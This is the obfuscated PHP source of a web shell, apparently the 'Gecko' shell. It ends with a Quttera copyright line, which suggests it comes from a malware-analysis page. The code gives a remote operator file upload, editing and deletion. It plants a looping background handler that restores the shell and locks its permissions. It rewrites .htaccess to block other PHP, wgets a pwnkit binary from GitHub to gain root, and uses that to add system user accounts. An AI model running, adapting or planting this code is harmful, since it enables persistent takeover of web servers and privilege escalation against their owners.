if (isset($_GET["lockshell"])) {
$utqmnnk = "curFile";
$jknnjceqxq = "TmpNames";
${"GLOBALS"}["qmlakymll"] = "TmpNames";
$isohmvpx = "curFile";
$zvtyjjr = "hndlers";
${"GLOBALS"}["ytpsdrzovm"] = "TmpNames";
$dbpnkmsfi = "fungsi";
$bdoupnyyd = "TmpNames";
${"GLOBALS"}["utpijttxc"] = "curFile";
${"GLOBALS"}["pkbruqy"] = "TmpNames";
${"GLOBALS"}["jmvkaguf"] = "fungsi";
${"GLOBALS"}["xhlfiasj"] = "fungsi";
$ynojlolnjc = "curFile";
${${"GLOBALS"}["vfuhqrqrce"]} = trim(basename($_SERVER["SCRIPT_FILENAME"]));
${${"GLOBALS"}["nfodbdej"]} = ${${"GLOBALS"}["snxjpduol"]}[31]();
if (file_exists(${${"GLOBALS"}["pkbruqy"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${$utqmnnk}) . "-handler")) && file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["xhlfiasj"]}[0]() . remove_dot(${$ynojlolnjc}) . "-text"))) {
${"GLOBALS"}["bmvgwnxbcio"] = "curFile";
${"GLOBALS"}["cmtlkbi"] = "curFile";
${"GLOBALS"}["awjjksll"] = "TmpNames";
$btcufyjqga = "fungsi";
cmd("rm -rf " . ${${"GLOBALS"}["awjjksll"]} . "/.sessions/." . base64_encode(${$btcufyjqga}[0]() . remove_dot(${${"GLOBALS"}["bmvgwnxbcio"]}) . "-text"));
cmd("rm -rf " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["cmtlkbi"]}) . "-handler"));
}
$enznadbms = "curFile";
${"GLOBALS"}["adfvwfpqx"] = "handler";
$jadnlsj = "curFile";
mkdir(${${"GLOBALS"}["qmlakymll"]} . "/.sessions");
cmd("cp $curFile " . ${$jknnjceqxq} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-text"));
$ehhejlebpl = "fungsi";
chmod(${${"GLOBALS"}["vfuhqrqrce"]}, 0444);
$lkbiqkuwg = "fungsi";
${${"GLOBALS"}["adfvwfpqx"]} = "\n\n@ini_set("max_execution_time\", 0);\nwhile (True){\n if (!file_exists("" . __DIR__ . "\")){\n mkdir("" . __DIR__ . "\");\n }\n if (!file_exists(\"" . ${$lkbiqkuwg}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "")){\n \$text = base64_encode(file_get_contents(\"" . ${${"GLOBALS"}["ytpsdrzovm"]} . "/.sessions/." . base64_encode(${$ehhejlebpl}[0]() . remove_dot(${$jadnlsj}) . "-text") . ""));\n file_put_contents(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["vfuhqrqrce"]} . "", base64_decode(\$text));\n }\n if (gecko_perm(\"" . ${$dbpnkmsfi}[0]() . "/" . ${$enznadbms} . "\") != 0444){\n chmod(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${$isohmvpx} . "", 0444);\n }\n}\n\nfunction gecko_perm(\$flename){\n return substr(sprintf("%o\", fileperms(\$flename)), -4);\n}\n";
$nbxxth = "hndlers";
${$zvtyjjr} = ${${"GLOBALS"}["jmvkaguf"]}[28](${$bdoupnyyd} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["utpijttxc"]}) . "-handler") . "", ${${"GLOBALS"}["vogxys"]});
if (${$nbxxth}) {
${"GLOBALS"}["crgdxzpu"] = "fungsi";
cmd("php " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["crgdxzpu"]}[0]() . remove_dot(${${"GLOBALS"}["vfuhqrqrce"]}) . "-handler") . " > /dev/null 2>/dev/null &");
} else {
failed();
}
}
if (isset($_POST["gecko-up-submit"])) {
$ovodrch = "fungsi";
${"GLOBALS"}["dblstedt"] = "tmpName";
${"GLOBALS"}["ykovngbq"] = "tmpName";
${${"GLOBALS"}["tskfcwedkdet"]} = $_FILES["gecko-upload"]["name"];
${${"GLOBALS"}["ykovngbq"]} = $_FILES["gecko-upload"]["tmp_name"];
if (${$ovodrch}[29](${${"GLOBALS"}["dblstedt"]}, ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["tskfcwedkdet"]})) {
success();
} else {
failed();
}
}
if ($_GET["logout"] == True) {
session_destroy();
session_unset();
success();
}
if (isset($_GET["destroy"])) {
$xuucfxmk = "DOC_ROOT";
${$xuucfxmk} = $_SERVER["DOCUMENT_ROOT"];
$sscohen = "CurrentFile";
${$sscohen} = trim(basename($_SERVER["SCRIPT_FILENAME"]));
if (${${"GLOBALS"}["snxjpduol"]}[4](${${"GLOBALS"}["wiyrtp"]})) {
${"GLOBALS"}["wfwlsa"] = "DOC_ROOT";
${"GLOBALS"}["gxytrvgtc"] = "htaccess";
${${"GLOBALS"}["yyxroabywchy"]} = "\n<FilesMatch "\.(php|ph*|Ph*|PH*|pH*)\$">\n Deny from all\n</FilesMatch>\n<FilesMatch \"^(" . ${${"GLOBALS"}["xpixzuvernku"]} . "|index.php|wp-config.php|wp-includes.php)\$">\n Allow from all\n</FilesMatch>\n<FilesMatch \"\\.(jpg|png|gif|pdf|jpeg)\$\">\n Allow from all\n</FilesMatch>";
${"GLOBALS"}["xbvdxflvcc"] = "put_htt";
${"GLOBALS"}["mgsqrjmx"] = "fungsi";
$umjimuogf = "put_htt";
${${"GLOBALS"}["xbvdxflvcc"]} = ${${"GLOBALS"}["mgsqrjmx"]}[28](${${"GLOBALS"}["wfwlsa"]} . "/.htaccess", ${${"GLOBALS"}["gxytrvgtc"]});
if (${$umjimuogf}) {
success();
} else {
failed();
}
} else {
failed();
}
}
if (isset($_POST["save-editor"])) {
${"GLOBALS"}["qlquuf"] = "save";
${"GLOBALS"}["pcqiaeue"] = "save";
${"GLOBALS"}["helvhc"] = "fungsi";
$blekadey = "fungsi";
${${"GLOBALS"}["pcqiaeue"]} = ${${"GLOBALS"}["helvhc"]}[28](${$blekadey}[0]() . "/" . unx($_GET["f"]), $_POST["code-editor"]);
if (${${"GLOBALS"}["qlquuf"]}) {
success();
} else {
failed();
}
}
if (isset($_GET["adminer"])) {
${"GLOBALS"}["oichbkmzrll"] = "fungsi";
${"GLOBALS"}["jcvjybokqux"] = "URL";
${${"GLOBALS"}["jcvjybokqux"]} = "https://github.com/vrana/adminer/releases/download/v4.8.1/adminer-4.8.1.php";
if (!${${"GLOBALS"}["oichbkmzrll"]}[3]("adminer.php")) {
$cobwbfqqduim = "fungsi";
$kvjkcnn = "URL";
cmd("wget " . ${$kvjkcnn} . " -O adminer.php --quiet");
echo "<meta http-equiv="refresh\" content="0;url=?d=" . hx(${$cobwbfqqduim}[0]()) . "\">";
}
}
if ($_GET["terminal"] == "root") {
${"GLOBALS"}["rfwqmutpdy"] = "fungsi";
if (!${${"GLOBALS"}["rfwqmutpdy"]}[3]("pwnkit")) {
cmd("wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit");
${"GLOBALS"}["tnjtxafjygt"] = "fungsi";
cmd("chmod +x pwnkit");
echo cmd("./pwnkit id > .mad-root");
echo "<meta http-equiv="refresh\" content=\"0;url=?d=" . hx(${${"GLOBALS"}["tnjtxafjygt"]}[0]()) . "&terminal=root">";
}
}
if (isset($_POST["submit-action"])) {
$dvyggfaifhal = "items";
${$dvyggfaifhal} = $_POST["check"];
if ($_POST["gecko-select"] == "delete") {
foreach (${${"GLOBALS"}["wsmiqmj"]} as ${${"GLOBALS"}["hcoospnffxw"]}) {
${"GLOBALS"}["gybkrqfv"] = "fd";
$hflksuh = "fd";
$blcjto = "fd";
$hrlurq = "fungsi";
${"GLOBALS"}["zujcwhq"] = "repl";
${${"GLOBALS"}["gsulzioh"]} = str_replace("\", "/", ${$hrlurq}[0]());
${${"GLOBALS"}["gybkrqfv"]} = ${${"GLOBALS"}["zujcwhq"]} . "/" . ${${"GLOBALS"}["hcoospnffxw"]};
if (is_dir(${$blcjto}) || is_file(${$hflksuh})) {
$gnetoshcg = "fd";
${"GLOBALS"}["yzhtwsn"] = "fd";
$ivhfruxuecjx = "rmdir";
${${"GLOBALS"}["nfnomta"]} = unlinkDir(${$gnetoshcg});
${${"GLOBALS"}["gpqxlxle"]} = ${${"GLOBALS"}["snxjpduol"]}[24](${${"GLOBALS"}["yzhtwsn"]});
if (${$ivhfruxuecjx} || ${${"GLOBALS"}["gpqxlxle"]}) {
success();
} else {
failed();
}
}
}
}
}
if (isset($_POST["submit"])) {
if ($_POST["create_folder"] == true) {
$ypqokprwpmng = "fungsi";
$gdpguhc = "NamaFolder";
${"GLOBALS"}["nctpkcloa"] = "NamaFolder";
${${"GLOBALS"}["nctpkcloa"]} = ${$ypqokprwpmng}[12]($_POST["create_folder"]);
if (${$gdpguhc}) {
success();
} else {
failed();
}
} else if ($_POST["create_file"] == true) {
$uvybcnskmbw = "namaFile";
${"GLOBALS"}["blvdfqohru"] = "fungsi";
${"GLOBALS"}["qrdxikgzs"] = "namaFile";
${${"GLOBALS"}["qrdxikgzs"]} = ${${"GLOBALS"}["blvdfqohru"]}[13]($_POST["create_file"]);
if (${$uvybcnskmbw}) {
success();
} else {
failed();
}
} else if ($_POST["renameFile"] == true) {
$ydnfxcqunmh = "renameFile";
${$ydnfxcqunmh} = ${${"GLOBALS"}["snxjpduol"]}[15](unx($_GET["re"]), $_POST["renameFile"]);
if (${${"GLOBALS"}["qhxnggsf"]}) {
success();
} else {
failed();
}
} else if ($_POST["chFile"]) {
$wgnsecqi = "chFiles";
${${"GLOBALS"}["ooftqvks"]} = ${${"GLOBALS"}["snxjpduol"]}[30](unx($_GET["ch"]), $_POST["chFile"]);
if (${$wgnsecqi}) {
success();
} else {
failed();
}
} else if (isset($_POST["add-username"]) && isset($_POST["add-password"])) {
${"GLOBALS"}["hxwkojkq"] = "fungsi";
if (!${${"GLOBALS"}["hxwkojkq"]}[3]("pwnkit")) {
cmd("wget https://github.com/MadExploits/Privelege-escalation/raw/main/pwnkit -O pwnkit");
cmd("chmod +x pwnkit");
${"GLOBALS"}["sqwlnasx"] = "fungsi";
cmd("./pwnkit \"id\" > .mad-root");
echo "<meta http-equiv="refresh" content=\"0;url=?d=" . hx(${${"GLOBALS"}["sqwlnasx"]}[0]()) . "&rooting=True">";
} else if (${${"GLOBALS"}["snxjpduol"]}[3](".mad-root")) {
$cbzwrut = "response";
${$cbzwrut} = ${${"GLOBALS"}["snxjpduol"]}[11](".mad-root");
$eshdcuwg = "response";
${${"GLOBALS"}["ideydyre"]} = explode(" ", ${$eshdcuwg});
if (${${"GLOBALS"}["ideydyre"]}[0] == "uid=0(root)") {
$snjesqrgx = "username";
${${"GLOBALS"}["fqwhcuj"]} = $_POST["add-username"];
${"GLOBALS"}["wupnbhiku"] = "username";
${${"GLOBALS"}["ohmuswhkxx"]} = $_POST["add-password"];
cmd("./pwnkit "useradd " . ${${"GLOBALS"}["wupnbhiku"]} . " ; echo -e "" . ${${"GLOBALS"}["ohmuswhkxx"]} . "\n" . ${${"GLOBALS"}["ohmuswhkxx"]} . "\" | passwd " . ${$snjesqrgx} . "\"");
} else {
echo "<meta http-equiv=\"refresh\" content="0;url=?d=" . hx(${${"GLOBALS"}["snxjpduol"]}[0]()) . "&adduser=failed">";
}
}
} else if ($_POST["lockfile"] == true) {
${"GLOBALS"}["hgdortc"] = "hndlers";
$cxichofrfpho = "hndlers";
${"GLOBALS"}["wupvrlsyhjk"] = "handler";
$jjwvypro = "flesName";
$moysjvktwc = "fungsi";
${"GLOBALS"}["tneuvl"] = "fungsi";
$gnyihl = "flesName";
${"GLOBALS"}["dljidwsezi"] = "TmpNames";
$gekesqmsi = "flesName";
$wzsgwh = "flesName";
$rsebcsqvk = "fungsi";
${"GLOBALS"}["cduzexfwcry"] = "TmpNames";
$yyhjqlb = "fungsi";
$yvfdddxa = "fungsi";
${$jjwvypro} = $_POST["lockfile"];
${${"GLOBALS"}["dljidwsezi"]} = ${${"GLOBALS"}["snxjpduol"]}[31]();
$rzhnqvtsnc = "flesName";
if (file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${$rsebcsqvk}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler")) && file_exists(${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . remove_dot(${$wzsgwh}) . "-text")) {
$rlgzkhpyjs = "fungsi";
${"GLOBALS"}["diqyijl"] = "TmpNames";
$vdjkeffd = "fungsi";
cmd("rm -rf " . ${${"GLOBALS"}["diqyijl"]} . "/.sessions/." . base64_encode(${$vdjkeffd}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-text-file"));
cmd("rm -rf " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${$rlgzkhpyjs}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler"));
}
mkdir(${${"GLOBALS"}["nfodbdej"]} . "/.sessions");
${"GLOBALS"}["vbpycrxw"] = "flesName";
${"GLOBALS"}["vqwwmxfkebq"] = "fungsi";
cmd("cp $flesName " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${$rzhnqvtsnc}) . "-text-file"));
chmod(${$gnyihl}, 0444);
${${"GLOBALS"}["wupvrlsyhjk"]} = "\n\n@ini_set("max_execution_time", 0);\nwhile (True){\n if (!file_exists("" . ${$yvfdddxa}[0]() . "")){\n mkdir(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "");\n }\n if (!file_exists("" . ${${"GLOBALS"}["tneuvl"]}[0]() . "/" . ${${"GLOBALS"}["vhimbugtql"]} . "\")){\n \$text = base64_encode(file_get_contents(\"" . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-text-file") . "\"));\n file_put_contents(\"" . ${$moysjvktwc}[0]() . "/" . ${$gekesqmsi} . "\", base64_decode(\$text));\n }\n if (gecko_perm(\"" . ${${"GLOBALS"}["snxjpduol"]}[0]() . "/" . ${${"GLOBALS"}["vhimbugtql"]} . "") != 0444){\n chmod(\"" . ${${"GLOBALS"}["vqwwmxfkebq"]}[0]() . "/" . ${${"GLOBALS"}["vbpycrxw"]} . "\", 0444);\n }\n}\n\nfunction gecko_perm(\$flename){\n return substr(sprintf(\"%o", fileperms(\$flename)), -4);\n}\n";
${${"GLOBALS"}["hgdortc"]} = ${$yyhjqlb}[28](${${"GLOBALS"}["cduzexfwcry"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler") . "", ${${"GLOBALS"}["vogxys"]});
if (${$cxichofrfpho}) {
cmd("php " . ${${"GLOBALS"}["nfodbdej"]} . "/.sessions/." . base64_encode(${${"GLOBALS"}["snxjpduol"]}[0]() . remove_dot(${${"GLOBALS"}["vhimbugtql"]}) . "-handler") . " > /dev/null 2>/dev/null &");
} else {
failed();
}
}
}© 2023 Quttera Ltd. All rights reserved.